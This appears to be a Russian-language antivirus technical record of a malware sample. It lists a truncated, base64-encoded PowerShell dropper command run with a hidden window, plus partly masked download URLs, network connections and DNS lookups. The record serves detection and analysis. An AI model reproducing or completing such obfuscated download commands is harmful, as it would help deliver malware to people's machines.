Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHIAcgAzADEAbQBfAD0AKAAnAFYAeQAnACsAJwBzAGQANwBrAGsAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgB0AEUAbQBwAFwAbwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\637232.cvr
- 'lu####streviews.com':80
- 'lu####streviews.com':443
- 'me#####ive.nichost.ru':80
- 'xi####u.phjrt.com':443
- http://www.lu####streviews.com/wp-includes/AYR/
- http://me#####ive.nichost.ru/awfcatfre/9thw57489/
- 'lu####streviews.com':443
- 'xi####u.phjrt.com':443
- DNS ASK lu####streviews.com
- DNS ASK yh##zx.com
- DNS ASK me#####ive.nichost.ru
- DNS ASK ku####ratham.com
- DNS ASK fx##.club
- DNS ASK xi####u.phjrt.com
- DNS ASK ba##mry.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHIAcgAzADEAbQBfAD0AKAAnAFYAeQAnACsAJwBzAGQANwBrAGsAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgB0AEUAbQBwAFwAbwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)